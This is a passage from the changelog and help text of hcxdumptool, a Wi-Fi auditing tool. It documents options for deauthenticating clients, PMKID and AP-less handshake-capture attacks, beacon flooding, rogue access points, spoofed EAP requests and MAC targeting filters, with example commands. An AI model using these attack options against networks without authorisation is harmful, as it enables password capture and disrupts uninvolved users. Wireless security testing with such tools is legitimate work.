to OpenSSL 1.1 06.02.2021 ========== hcxdumptool: fixed handling of BE (according to hcxpcapngtool fixes) 18.01.2021 ========== hcxdumptool: added auto channel/auto band. therefore default channel list and predefined channel lists changed! -c : set channel (1,2,3, ...) default: auto channel/auto band maximum entries: 255 standard 802.11 channels (depends on device, driver and world regulatory domain): 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 36, 38, 40, 44, 48, 52, 56, 60, 64 100, 104, 108, 112, 116, 120, 124, 128 132, 136, 140, 144, 149, 153, 157, 161, 165 201, 205, 209, 213, 217, 221, 225, 229, 233 -s : set predefined scanlist 0 = auto channel/auto band (default) 1 = 1,6,11,3,5,1,6,11,2,4,1,6,11,7,9,1,6,11,8,10,1,6,11,12,13 (optimized 2.4GHz) 2 = 1,2,3,4,5,6,7,8,9,10,11,12,13 (standard 2.4 GHz) 3 = 36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165 (standard 5GHz) 4 = 1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165 (standard 2.4GHz/5GHz) 5 = 201,205,209,213,217,221,225,229,233 (standard 6GHz) 16.01.2021 ========== hcxdumptool: added new option - rcascan ranking is no longer hard coded --rcascan_order=digit> : rcascan sorting order: 0 = sort by HIT (PROBERESPONSE) (default) 1 = sort by COUNT (BEACON) 2 = sort by CHANNEL 14.01.2021 ========== release v 6.1.5 03.01.2021 ========== hcxdummptool: added new option to limit status of rcascan to n lines --rcascan_max=digit> : show only n highest ranking lines default: 256 lines 21.12.2020 ========== removed TP-LINK TL-WN722N v1 (ath9k driver) from list of working devices due to driver issue hcxdumptool: moved from select() to pselect() 20.12.2020 ========== hcxdumptool: added tot (transmission timeout timer) hcxdumptool will no longer freeze if driver died this is a workaround on ath9k driver issue: https://github.com/ZerBea/hcxdumptool/issues/80#issuecomment-748622644 not caused by hcxdumptool: https://bugs.archlinux.org/task/68578 19.12.2020 ========== hcxdumptool: added support for 6GHz channels 201,205,209,213,217,221,225,229,233 on option -c and option -s -s : set predefined scanlist 0 = 1,6,11,3,5,1,6,11,2,4,1,6,11,7,9,1,6,11,8,10,1,6,11,12,13 (default) 1 = 1,2,3,4,5,6,7,8,9,10,11,12,13 2 = 36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165 3 = 1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165 4 = 201,205,209,213,217,221,225,229,233 10.12.2020 ========== Makefile: make use of pkg-config 02.12.2020 ========== release v 6.1.4 27.11.2020 ========== hcxdumptool: show openSSL version in status 24.10.2020 ========== hcxdumptool: Default channels are not longer hard coded. Now hcxdumptool test if channel is available. That allow handling of channels from a patched driver. Some 2 GHz ath9k radios are actually tunable on 2312-2732 on 5 MHz steps CHAN2G(2407, 14) CHAN2G(2402, 15) CHAN2G(2397, 16) CHAN2G(2392, 17) CHAN2G(2387, 18) CHAN2G(2382, 19) CHAN2G(2377, 20) CHAN2G(2372, 21) CHAN2G(2367, 22) CHAN2G(2362, 23) CHAN2G(2357, 24) CHAN2G(2352, 25) CHAN2G(2347, 26) CHAN2G(2342, 27) CHAN2G(2337, 28) CHAN2G(2332, 29) CHAN2G(2327, 30) CHAN2G(2322, 31) CHAN2G(2317, 32) CHAN2G(2312, 33) 09.10.2020 ========== release v 6.1.3 fixed broken GPS handling added better GPS error handling 03.10.2020 ========== hcxdumptool: added new option --example : show some example command lines 30.09.2020 ========== hcxdumptool: added new options --eapreq=[:],... : send max. 20 subsequent EAP requests after initial EAP ID request, hex string starting with EAP Type response is terminated with: :F = EAP Failure :S = EAP Success :I = EAP ERP Initiate :F = EAP ERP Finish :D = Deauthentication :T = TLS shutdown :- = no packet default behavior is terminating all responses with a EAP Failure, after last one the client is deauthenticated --eaptlstun : activate TLS tunnel negotiation and Phase 2 EAP requests when requesting PEAP using --eapreq requires --eap_server_cert and --eap_server_key --eap_server_cert= : EAP TLS tunnel Server cert PEM file --eap_server_key= : EAP TLS tunnel Server private key file 17.09.2020 ========== release v 6.1.2 15.09.2020 ========== hcxdumptool: added new option --stop_client_m2_attacks= : stop attacks against CLIENTS after 10 M2 frames received affected: ap-less (EAPOL 2/4 - M2) attack require hcxpcangtool --all option 24.08.2020 ========== hcxdumptool: added new option --eapreq=[:],... : send max. 20 subsequent EAP requests after initial EAP ID request, hex string starting with EAP Type response is terminated with :F = EAP Failure, :S = EAP Success, :I = EAP ERP Initiate, :F = EAP ERP Finish, :D = Deauthentication, :- = no packet default behavior is terminating all responses with a Failure packet, after last one the client is deauthenticated 14.08.2020 ========== hcxdumptool: added new option --wpaent to announce WPA ENTERPRISE 06.08.2020 ========== release v 6.1.1 fixed handling of long opts 30.07.2020 ========== hcxdumptool: added new option --ip to allow to set IP for server / client mode 29.07.2020 ========== hcxdumptool: add new radiotap flag: IEEE80211_RADIOTAP_F_TX_NOSEQNO https://patchwork.kernel.org/patch/11680527/ 29.07.2020 ========== release v 6.1.0 19.07.2020 ========== hcxdumptool: new option --beaconparams= : update or add Information Elements in all transmitted beacons maximum 50 IEs as TLV hex string, tag id 0 (ESSID) will be ignored, tag id 3 (channel) overwritten multiple IEs with same tag id are added, default IE is overwritten by the first 06.07.2020 ========== hcxdumptool: allow to set channel (-c) on --check_injection fixed display channel if tags.channel is empty added new option -s to set predefined scanlists -s : set predefined scanlist 0 = 1,6,11,3,5,1,6,11,2,4,1,6,11,7,9,1,6,11,8,10,1,6,11,12,13 (default) 1 = 1,2,3,4,5,6,7,8,9,10,11,12,13 2 = 36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165 3 = 1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48,52,56,60,64,100,104,108,112,116,120,124,128,132,136,140,149,153,157,161,165 15.06.2020 ========== release v 6.0.7 10.06.2020 ========== hcxdumptool: changed behavior of --essidlist and --active_beacon according to https://github.com/ZerBea/hcxdumptool/issues/115 --essidlist - transmit beacons from this list only --active_beacon - transmit beacons from collected ESSIDs and from essidlist 21.05.2020 ========== release v 6.0.6 18.05.2020 ========== hcxdumptool: added new option --do_targetscan --do_targetscan= : same as do_rcascan - hide all networks, except target 17.05.2020 ========== hcxdumptool: fixed issue that caused hcxdumptool to respond on probereuest even if --silent is selcted allow MAC format 11:22:33:44:55:66 and 11-22-33-44-55-66 in filterlists 01.05.2020 ========== hcxdumptool: added option mask to save vendor defined action frames -f : frames to save bitmask: 0: clear default values 1: MANAGEMENT frames (default) 2: EAP and EAPOL frames (default) 4: IPV4 frames 8: IPV6 frames 16: WEP encrypted frames 32: WPA encrypted frames 64: vendor defined frames (AWDL) 05.04.2020 ========== release v 6.0.5 Security fix: We do not want to disturb uninvolved users! Increase error count and terminate hcxdumptool if channel was changed by a third party tool. After transmitting a request, hcxdumptool expect an answer on the same channel. If the channel was changed by a third party tool, hcxdumptool will never get this answer and transmit again, again and again. This will jam all channels, set by the third party tool. https://forum.hashkiller.io/index.php?threads/ap-less-attack-with-hcxtools.21036/page-4#post-237403 04.04.2020 ========== release v 6.0.4 27.03.2020 ========== hcxdumptool: ERROR_MAX not longer hard coded --error_max= : terminate hcxdumptool if error maximum reached default: 100 errors 26.03.2020 ========== Some drivers / firmwares provide only limited monitor functions instead of full packet injection capabilities. hcxdumptool: added packet injection test --check_injection : run packet injection test to determine that driver support full packet injection\n" 18.03.2020 ========== release v 6.0.3 removed debug message "OS not supported" from Makefile 14.03.2020 ========== release v 6.0.2 complete rewrite from scratch the Raspberry Pi is a little bit too slow, so we have to reduce status output. Most CLIENTs running randomized MACs. They are no longer displayed. improved IE tag walk similar to hcxpcapngtool improved attack vector added new options to improve attack vector against hardened targets added more information to help menu added option to import Berkeley packet Filter code fom tcpdump as alternative to apfilterlist and clientfilterlist make less noise on the the channel (receive more, transmit less) WLAN REASON CODE (deauthentication) no longer hardcoded moved to git versioning on non releases $ hcxdumptool -h hcxdumptool 6.0.2 (C) 2020 ZeroBeat usage : hcxdumptool press the switch to terminate hcxdumptool hardware modification is necessary, read more: https://github.com/ZerBea/hcxdumptool/tree/master/docs example: hcxdumptool -o output.pcapng -i wlp39s0f3u4u5 -t 5 --enable_status=3 do not run hcxdumptool on logical (NETLINK) interfaces (monx, wlanxmon) do not use hcxdumptool in combination with other 3rd party tools, which take access to the interface short options: -i : interface (monitor mode will be enabled by hcxdumptool) can also be done manually: ip link set down iw dev set type monitor ip link set up WARNING: iw use NETLINK (libnl) and hcxdumptool will not work on pure NETLINK interfaces -o : output file in pcapng format including radiotap header (LINKTYPE_IEEE802_11_RADIOTAP) -f : frames to save bitmask: 0: clear default values 1: MANAGEMENT frames (default) 2: EAP and EAPOL frames (default) 4: IPV4 frames 8: IPV6 frames 16: WEP encrypted frames 32: WPA encrypted frames to clear default values use -f 0 first, followed by desired frame type (e.g. -f 0 -f 4) -c : set scan list (1,2,3, ...) default scan list: 1...13 maximum entries: 127 allowed channels (depends on the device): 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14 32, 34, 36, 38, 40, 42, 44, 46, 48, 50, 52, 54, 56, 58, 60, 62, 64, 68, 96 100, 102, 104, 106, 108, 110, 112, 114, 116, 118, 120, 122, 124, 126, 128 132, 134, 136, 138, 140, 142, 144, 149, 151, 153, 155, 157, 159 161, 165, 169, 173 -t : stay time on channel before hopping to the next channel default 4 seconds -m : set monitor mode by ioctl() system call and quit -I : show WLAN interfaces and quit -C : show available channels and quit if no channels are available, interface is probably in use or doesn't support monitor mode long options: --do_rcascan : show radio channel assignment (scan for target access points) this can be used to test that ioctl() calls and packet injection is working if you got no HIT, packet injection is possible not working also it can be used to get information about the target and to determine that the target is in range use this mode to collect data for the filter list run this mode at least for 2 minutes to save all received raw packets use option -o --reason_code= : deauthentication reason code recommended codes: 1 WLAN_REASON_UNSPECIFIED 2 WLAN_REASON_PREV_AUTH_NOT_VALID 4 WLAN_REASON_DISASSOC_DUE_TO_INACTIVITY 5 WLAN_REASON_DISASSOC_AP_BUSY 6 WLAN_REASON_CLASS2_FRAME_FROM_NONAUTH_STA 7 WLAN_REASON_CLASS3_FRAME_FROM_NONASSOC_STA (default) 9 WLAN_REASON_STA_REQ_ASSOC_WITHOUT_AUTH --disable_client_attacks : do not attack clients affected: ap-less (EAPOL 2/4 - M2) attack --disable_ap_attacks : do not attack access points affected: connected clients and client-less (PMKID) attack --stop_ap_attacks= : stop attacks against ACCESS POINTs if BEACONs received default: stop after 600 BEACONs --resume_ap_attacks= : resume attacks against ACCESS POINTs after BEACONs received default: 864000 BEACONs --disable_deauthentication : do not send deauthentication or disassociation frames affected: conntected clients --silent : do not transmit! hcxdumptool is acting like a passive dumper expect possible packet loss --eapoltimeout= : set EAPOL TIMEOUT (microseconds) default: 20000 usec --bpfc= : input Berkeley Packet Filter (BPF) code steps to create a BPF (it only has to be done once): set hcxdumptool monitormode $ hcxumptool -m create BPF to protect a MAC $ tcpdump -i not wlan addr1 11:22:33:44:55:66 and not wlan addr2 11:22:33:44:55:66 -ddd > protect.bpf recommended to protect own devices or create BPF to attack a MAC $ tcpdump -i wlan addr1 11:22:33:44:55:66 or wlan addr2 11:22:33:44:55:66 -ddd > attack.bpf not recommended, because important pre-authentication frames will be lost due to MAC randomization of the CLIENTs use the BPF code $ hcxumptool -i --bpfc=attack.bpf ... see man pcap-filter for a list of all filter options --filterlist_ap= : ACCESS POINT MAC filter list format: 112233445566 + comment maximum entries 256 run first --do_rcascan to retrieve information about the target --filterlist_client= : CLIENT MAC filter list format: 112233445566 # comment maximum entries 256 due to MAC randomization of the CLIENT, it does not always work! --filtermode= : mode for filter list mandatory in combination with --filterlist_ap and/or --filterlist_client 0: ignore filter list (default) 1: use filter list as protection list do not interact with ACCESS POINTs and CLIENTs from this list 2: use filter list as target list only interact with ACCESS POINTs and CLIENTs from this list not recommended, because important pre-authentication frames will be lost due to MAC randomization of the CLIENTs --weakcandidate= : use this pre shared key (8...63 characters) for weak candidate alert will be saved to pcapng to inform hcxpcaptool default: --mac_ap : use this MAC as ACCESS POINT MAC instead of a randomized one format: 112233445566 --mac_client : use this MAC as CLIENT MAC instead of a randomized one format: 112233445566 --essidlist= : transmit beacons from this ESSID list maximum entries: 256 ESSIDs --active_beacon : transmit beacon once every 200000 usec affected: ap-less --flood_beacon : transmit beacon on every received beacon affected: ap-less --infinity : prevent that a CLIENT can establish a connection to an assigned ACCESS POINT affected: ACCESS POINTs and CLIENTs --use_gps_device= : use GPS device /dev/ttyACM0, /dev/ttyUSB0, ... NMEA 0183 $GPGGA $GPGGA --use_gpsd : use GPSD device NMEA 0183 $GPGGA, $GPRMC --nmea= : save track to file format: NMEA 0183 $GPGGA, $GPRMC, $GPWPL to convert it to gpx, use GPSBabel: gpsbabel -i nmea -f hcxdumptool.nmea -o gpx -F file.gpx to display the track, open file.gpx with viking --gpio_button= : Raspberry Pi GPIO pin number of button (2...27) default = GPIO not in use --gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27) default = GPIO not in use --tot= : enable timeout timer in minutes (minimum = 2 minutes) : hcxdumptool will terminate if tot reached (EXIT code = 2) --reboot : once hcxdumptool terminated, reboot system --poweroff : once hcxdumptool terminated, power off system --enable_status= : enable real-time display (waterfall) only incomming traffic only once at the first occurrence due to MAC randomization of CLIENTs bitmask: 0: no status (default) 1: EAP and EAPOL 2: ASSOCIATION and REASSOCIATION 4: AUTHENTICATION 8: BEACON and PROBERESPONSE 16: ROGUE AP 32: GPS (once a minute) 64: internal status (once a minute) 128: run as server 256: run as client characters < 0x20 && > 0x7e are replaced by . example: show everything but don't run as server or client (1+2+4+8+16 = 31) show only EAP and EAPOL and ASSOCIATION and REASSOCIATION (1+2 = 3) --server_port= : define port for server status output (1...65535) : default IP: 224.0.0.255 : default port: 60123 --client_port= : define port for client status read (1...65535) : default IP: 224.0.0.255 : default port: 60123 --check_driver : run several tests to determine that driver support all(!) required ioctl() system calls --help : show this help --version : show version Run hcxdumptool -i interface --do_rcascan for at least 30 seconds, before you start an attack! Do not edit, merge or convert this pcapng files, because it will remove optional comment fields! It is much better to run gzip to compress the files. Wireshark, tshark and hcxpcapngtool will understand this. If hcxdumptool captured your password from WiFi traffic, you should check all your devices immediately! If you use GPS, make sure GPS device is inserted and has a GPS FIX, before you start hcxdumptool! 06.03.2020 ========== complete rewrite from scratch the Raspberry Pi is a little bit too slow, so we have to reduce status output. Most CLIENTs running randomized MACs. They are no longer displayed. improved IE tag walk similar to hcxpcapngtool improved attack vector added new options to improve attack vector against hardened targets added more information to help menu added option to import Berkeley packet Filter code fom tcpdump as alternative to apfilterlist and clientfilterlist make less noise on the the channel (receive more, transmit less) WLAN REASON CODE (deauthentication) no longer hardcoded moved to git versioning on non releases 29.01.2020 ========== moved to v6.0.1 removed options to set userdefined MAC_AP and/or MAC_CLIENT, because they make hcxdumptool's stealth capability ineffective improved handling of association/reassociation frames improved handling of null/powersave frames added counter for PMKID/EAPOL frames handle EAP request/response frames improved IE tag walk similar to hcxpcapngtool fixed cipher suite and AKM suite handling handle wrong FCS reduce pcapng size fixed internal counters allow mixed attack vector PSK/PSK256 handle PMKID in reassociationrequest 11.12.2019 ========== moved to v6.0.0 hcxdumptool: complete rewrite from scratch filterlist splitted (APs, CLIENTs), entries increased upt to 256 each list: --filterlist_ap --filterlist_client improved real time display: driver information and firmware information (if available) detailed information about PMKID and MESSAGE PAIR) allow more than one option (--enable_status) 0: no status (default) 1: EAPOL 2: PROBE REQUEST/PROBE RESPONSE 4: AUTHENTICATON 8: ASSOCIATION/REASSOCIATION 16: BEACON 32: GPS (once a minute) 64: internal status 128: send status to client choose pcapng frames to save (-f) using option -o improved rca_scan: 0: no real time display 1: show only access points in range (default) 2: show only access points not range 3: show all access points improved GPS handling: read GPS information directly from device --use_gps_device= or us GPSD --use_gpsd use full standard NMEA raw sentence $GPGGA, $GPRMC, $GPGWL this version need hcxpcaptool v6.0.0 to convert GPS information or gpsbabel gpsbabel -i nmea -f nmea.txt -o gpx -F test.gpx then open test.gpx with viking (layer -> waypoint -> BSSID) ignore M4 if SNONCE is zeroed ignore PMKID if zeroed improved handling of radiatapheader on ath9k_htc driver new option codes: ENTERPRISE NUMBER 0x2a, 0xce, 0x46, 0xa1 MAGIC NUMBER 0x2a, 0xce, 0x46, 0xa1, 0x79, 0xa0, 0x72, 0x33, 0x83, 0x37, 0x27, 0xab, 0x59, 0x33, 0xb3, 0x62, 0x45, 0x37, 0x11, 0x47, 0xa7, 0xcf, 0x32, 0x7f, 0x8d, 0x69, 0x80, 0xc0, 0x89, 0x5e, 0x5e, 0x98 OPTIONCODE_MACMYORIG 0xf29a (6 byte) OPTIONCODE_MACMYAP 0xf29b (6 byte) OPTIONCODE_RC 0xf29c (8 byte) OPTIONCODE_ANONCE 0xf29d (32 byte) OPTIONCODE_MACMYSTA 0xf29e (6 byte) OPTIONCODE_SNONCE 0xf29f (32 byte) OPTIONCODE_WEAKCANDIDATE 0xf2a0 (32 byte) OPTIONCODE_GPS 0xf2a1 (max 128 byte) removed weak candidate check, because it leads to many, many unauthorized MP:M1M2 hcxpioff: new options --tot, --poweroff, --reboot --tot= : enable timeout timer in minutes (minimum = 2 minutes) : hcxpioff will terminate if tot reached --reboot : once hcxpioff terminated, reboot system 20.09.2019 ========== hcxdumptool: added pcapng custom block we store all custom information inside this block list of used pcapng option codes: #define OPTIONCODE_MACMYORIG 0xf29a #define OPTIONCODE_MACMYAP 0xf29b #define OPTIONCODE_RC 0xf29c #define OPTIONCODE_ANONCE 0xf29d #define OPTIONCODE_MACMYSTA 0xf29e #define OPTIONCODE_SNONCE 0xf29f #define OPTIONCODE_WEAKCANDIDATE 0xf2a0 18.09.2019 ========== hcxdumptool: added new option --weak_candidate added weak candidate detection on PMKID and WPA1 weak candidate is no longer "hard coded" ---weak_candidate= : use this password (8...63 characters) for weak candidate alert default: 00000000 affected: client-less attack list of used pcapng option codes: #define OPTIONCODE_MACMYAP 62107 #define OPTIONCODE_RC 62108 #define OPTIONCODE_ANONCE 62109 #define OPTIONCODE_MACMYSTA 62110 #define OPTIONCODE_SNONCE 62111 #define OPTIONCODE_WEAKCANDIDATE 62112 17.09.2019 ========== hcxdumptool: added weak password check high experimental, only on WPA2 QOS new dependency: lib crypto (openssl) 07.09.2019 ========== hcxdumptool: added new options --reactive_beacon : send internal/external beacon on every received proberequest affected: ap-less --flood_beacon= : transmit internal/external beacon after every received management packet affected: ap-less 05.09.2019 ========== hcxdumptool: added new options (feature request: https://github.com/ZerBea/hcxdumptool/issues/70) --disable_internal_beacons : do not transmit beacons using received ESSIDs default: transmit this kind of beacon once on channel change or every five seconds affected: ap-less and reactive_beacon, flood_beacon --use_external_beaconlist= : transmit beacons from this list maximum ESSID length 32, maximum entries 4095 default: transmit this kind of beacon once on channel change or every five seconds affected: ap-less and reactive_beacon, flood_beacon 28.08.2019 ========== moved to v5.2.2 02.09.2019 ========== hcxdumptool : added bind() ll.sll_pkttype = PACKET_OTHERHOST | PACKET_OUTGOING added setsockopt() r.mr_type = PACKET_MR_PROMISC now dmesg will show when device entered promiscuous mode during hcxdumptool initialization: [ 6313.657830] device wlp3s0f0u11u1 entered promiscuous mode and when it left promiscuous mode when hcxdumptool terminated: [ 6313.735833] device wlp3s0f0u11u1 left promiscuous mode 01.09.2019 ========== hcxdumptool : print additional information about interfering services first_steps.txt : added quickstart guide to docs 28.08.2019 ========== moved to v5.2.1 25.08.2019 ========== hcxdumptool: removed option --ignore_warning (no longer needed) hcxdumptool forces to set monitor mode running ioctl(SIOCGIWMODE) IW_MODE_MONITOR if that doesn't work on first try, try it again and/or do monitor mode manually: ip link set down iw dev set type monitor ip link set up warning: on some drivers rtlXXXX netlink will not notice that we use forced ioctl() system calls in that case iw dev wlp3s0f0u11u4 will show you that the "netlink part" is still managed Interface wlp3s0f0u11u4 ifindex 11 wdev 0x800000001 addr 70:f1:1c:27:ae:ec type managed wiphy 8 txpower 13.00 dBm 19.08.2019 ========== moved to v5.2.0 18.08.2019 ========== hcxdumptool: print ESSID on status 1 15.08.2019 ========== hcxdumptool: added server - client status output (only local networkes) --server_port= : define port for server status output (1...65535) : default IP: 224.0.0.255 --client_port= : define port for client status read (1...65535) : default IP: 224.0.0.255 example: on client machine run hcxdumptool with option --client_port=12345 $ hcxdumptool -i -o test.pcapng --enable_status=1 --client_port=12345 on caputure machine run hcxdumptool with option --server_port=12345 $ hcxdumptool -i -o test.pcapng --enable_status=1 --server_port=12345 13.08.2019 ========== hcxdumptool: added new option --check_driver --check_driver : run several tests to determine that driver support all(!) required system calls If everything is fine, result should look like this: $ sudo hcxdumptool -i wlp3s0f0u10u4 --check_driver driver tests passed - all required ioctl() system calls are supported by driver If not, hcxdumptool will show which test failed: $ sudo hcxdumptool -i wlp3s0f0u10u5 --check_driver ioctl(SIOCGIFFLAGS) failed: No such device ioctl(SIOCGIWMODE) failed: No such device ioctl(SIOCSIFFLAGS) failed: No such device ioctl(SIOCSIWMODE) - IW_MODE_MONITOR failed: No such device ioctl(SIOCGIWMODE) failed: No such device ioctl(SIOCGIWMODE) - IW_MODE_MONITOR failed ioctl(SIOCSIFFLAGS) -IFF_UP failed: No such device ioctl(SIOCGIFFLAGS) failed: No such device ioctl(SIOCGIFFLAGS) - IFF_UP | IFF_RUNNING | IFF_BROADCAST failed ioctl(SIOCGIFINDEX) failed: No such device ioctl(SIOCETHTOOL) - ETHTOOL_GPERMADDR failed: No such device ioctl(SIOCSIWFREQ) - IW_FREQ_FIXED failed: No such device it looks like this interface/driver isn't suitable for hcxdumptool possible reasons: wrong interface selected interface is blocked by another tool driver doesn't support required ioctl() system calls 12.08.2019 ========== hcxdumptool: a crappy filter list is not longer a reason to terminate initialization 11.08.2019 ========== hcxdumptool: added new options --tot and --reboot --tot= : enable timeout timer in minutes (minimum = 2 minutes) : hcxdumptool will terminate if tot reached (EXIT code = 2) --reboot : once hcxdumptool terminated, reboot system hcxdumptool return values: 0 = every thing is fine 1 = error occured 2 = tot reached 23.07.2019 ========== hcxdumptool: moved from usleep() to nanosleep() hcxpioff: moved from usleep() to nanosleep() 17.07.2019 ========== added some additional information which ioctl() command isn't supported by driver added warning on option --do_rcascan if packet injection fails (driver doesn't support full packet injection) after 20 seconds Remarks: nl80211/cfg80211/mac80211 doesn't use use ioctl() calls, they use netlink. hcxdumptool use ioctl() calls and will not work on netlink. That is the case, if ioctl(SIOCGIWMODE) or ioctl(SIOCSIWMODE) calls failed! Read more here: https://www.quora.com/What-are-the-differences-between-netlink-sockets-and-ioctl-calls 30.06.2019 ========== increased maximum filter list entries from 64 up to 255 this will have a price tag, because hcxdumptool's respond time increases. 25.06.2019 ========== detect Raspberry Pi 4 23.06.2019 ========== moved to v 5.1.7 hcxdumptool: improved help fixed pcpng option header 12.06.2019 ========== hcxdumptool: ignore more warnings if --ignore_warning is selcted do not report issues if you run this option!!! 29.05.2019 ========== hcxdumptool moved to v 5.1.5 19.05.2019 ========== hcxdumptool: activated option --ignore warning --ignore_warning : ignore warnings try this if you get some driver warnings do not report issues 16.04.2019 ========== updated wiki device and README.md. This adapters are working fine, running kernel 4.19, 4.20 and 5.0: EDIMAX EW-7711UAN ID 7392:7710 Edimax Technology Co., Ltd ALLNET ALL-WA0150N ID 148f:7601 Ralink Technology, Corp. MT7601U Wireless Adapter TENDA W311U+ ID 148f:3070 Ralink Technology, Corp. RT2870/RT3070 Wireless Adapter LogiLink WL0151 ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter regardles of the xhci issue. 14.04.2019 ========== removed all device names from README.md, because VENDORS often change chipsets or driver errors occur: v1 of a device is working fine, while v2 doesn't work device A, running driver A is working fine, while device B running driver A doesn't work driver doesn't support monitor mode driver support monitor mode, but doesn't support packet injection Examples here: https://bugzilla.kernel.org/show_bug.cgi?id=202241 https://bugzilla.kernel.org/show_bug.cgi?id=202243 https://bugzilla.kernel.org/show_bug.cgi?id=202541 To find a working device, I recommend to read wikidevi: https://wikidevi.com/ 02.04.2019 ========== hcxdumptool now use this radiotap header: static const uint8_t hdradiotap[] = { 0x00, 0x00, // radiotap version + pad byte 0x0e, 0x00, // radiotap header length 0x06, 0x8c, 0x00, 0x00, // bitmap 0x00, // flags 0x02, // rate 0x14, // tx power 0x01, // antenna 0x08, 0x00 // tx flags #define HDRRT_SIZE sizeof(hdradiotap) }; read more about radiotap header here: https://www.kernel.org/doc/Documentation/networking/mac80211-injection.txt header is working with: ID 148f:761a Ralink Technology, Corp. MT7610U ("Archer T2U" 2.4G+5G WLAN Adapter removed "USB ID 7392:a812 Edimax Technology Co., Ltd" from "known as working device list" because this driver is not working with the radiotap header. 30.03.2019 ========== hcxdumptool: added new option --silent --silent : do not transmit! hcxdumptool is acting like a passive dumper added RTL8187. Removed the wron devices from the list (only RT3070 ia affected) * USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter (ALFA AWUS036H) * USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter 29.03.2019 ========== added cflag DEBUG if compiled with DEBUG, hcxdumptool show raw packets and raw GSP data, directly received from the device removed ALFA AWUS036NH from the "known as workinging list", because the device doesn't work any longer, running kernel 5.0. 28.03.2019 ========== removed devices from "known working" list: * USB ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter (ALFA AWUS036H) * USB ID 0bda:8189 Realtek Semiconductor Corp. RTL8187B Wireless 802.11g 54Mbps Network Adapter because they are not working running kernel 5.0 27.03.2019 ========== removed wiringPi dependency now we are running "bare metal" - complete GPIO stuff moved to hcxdumptool and hcxpioff do not use wiringPi in combination with hcxdumptool and/or hcxpioff Makefile: removed DOGPIOSUPPORT hcxdumptool: changed options wiringPi options to GPIO options --gpio_button= : Raspberry Pi GPIO pin number of button (2...27) default = GPIO not in use --gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27) default = GPIO not in use hcxpioff: changed options wiringPi options to GPIO options --gpio_button= : Raspberry Pi GPIO pin number of button (2...27) default = GPIO not in use --gpio_statusled= : Raspberry Pi GPIO number of status LED (2...27) default = GPIO not in use The GPIO is disabled on default. If you like to activate GPIO support you must do the hardware modifactions as described here: doc/gpiowait.odg and set the options according to your modification. You can choose every GPIO pin, as long as you use a pull down resistor to ground. Raspberry model should be detected by automatic and according to the revision we use: GPIO mem 0x20000000 for A, B, A+, B+, and Zero, Zero W(H) GPIO mem 0x3F000000 for 2B, 3B, 3A+, 3B+ compute modules (CMx) are not supported. 20.03.2019 ========== hcxdumptool: GPIO pins are no longer hard coded! --wpi_button= : wiringPi number of of button (0...31, Raspberry Pi A and B: 0 .. 16) default = 7 --wpi_statusled= : wiringPi number of status LED (0...31, Raspberry Pi A and B: 0 .. 16) default = 0 19.03.2019 ========== hcxpioff: refactored - GPIO pins are no longer hard coded! --wpi_button= : wiringPi number of of button (0...31, Raspberry Pi A and B: 0 .. 16) default = 7 --wpi_statusled= : wiringPi number of status LED (0...31, Raspberry Pi A and B: 0 .. 16) default = 0 --help : show this help --version : show version 16.03.2019 ========== added man page hcxdumptool.1 removed device from list: USB ID 7392:a812 Edimax Technology Co., Ltd (Edimax AC600 USB / Manufacturer: Realtek) because the driver from here: https://github.com/aircrack-ng/rtl8812au is no longer working on kernel 5.0 09.03.2019 ========== hcxdumptool moved to v 5.1.4 hcxdumptool: added new option: --ignore_warning : hcxdumptool will not terminate if other services take access on the device : warning: expect problems if hcxdumptool tries to change channels From now on, hcxdumptool will not terminate during the initalization if another service take access on the interface. Expect problems and do not report issues related to this option!!!! From now on, hcxdumptool will also show channel and frequency (when running option -C) 1 / 2412MHz (20 dBm) 2 / 2417MHz (20 dBm) 3 / 2422MHz (20 dBm) 4 / 2427MHz (20 dBm) 5 / 2432MHz (20 dBm) 6 / 2437MHz (20 dBm) 7 / 2442MHz (20 dBm) 8 / 2447MHz (20 dBm) 9 / 2452MHz (20 dBm) 10 / 2457MHz (20 dBm) 11 / 2462MHz (20 dBm) 12 / 2467MHz (20 dBm) 13 / 2472MHz (20 dBm) 09.03.2019 ========== hcxdumptool: added improved warning message Now hcxdumptool print the error message received from the driver inside the brackets $ hcxdumptool -i wlp3s0f0u1 -c 14 initialization... warning: unable to set channel 14 (Invalid argument) - removed this channel from scan list In this case the user tried to set channel 14. The driver doesn't support this and responds with Invalid argument 07.03.2019 ========== hcxdumptool: added debug code in main packet loop [processpackets()] to print raw GPS data, received from GPSD: /* printf("\ndebug: %s\n", gpsddata); */ uncomment this before you run make to retrieve this values. 06.03.2019 ========== hcxdumptool: added GPS date and GPS time to status and pcapng comment field. $ sudo hcxdumptool -i wlp3s0f0u1 --use_gpsd -o test.pcapng initialization... connecting to GPSD... waiting up to 5 seconds to retrieve first position GPSD activated start capturing (stop with ctrl+c) GPS LATITUDE.............: 49.126403 GPS LONGITUDE............: 4.626175 GPS ALTITUDE.............: 129.500000 GPS DATE.................: 06.03.2019 GPS TIME.................: 21:52:41 INTERFACE................: wlp3s0f0u1 ERRORMAX.................: 100 errors FILTERLIST...............: 0 entries MAC CLIENT...............: f04f7c89dabb MAC ACCESS POINT.........: 980ee432604d (incremented on every new client) EAPOL TIMEOUT............: 150000 REPLAYCOUNT..............: 61455 ANONCE...................: 182972399cd2e65deb7941601cca14b644681c092dcf6f704935c7f3d2eaceea INFO: cha=11, rx=7080, rx(dropped)=1676, tx=408, powned=10, err=0, lat=49.126342, lon=4.626268, alt=129.500000, gpsdate=06.03.2019, gpstime=22:01:55^C terminated... $ tshark -r 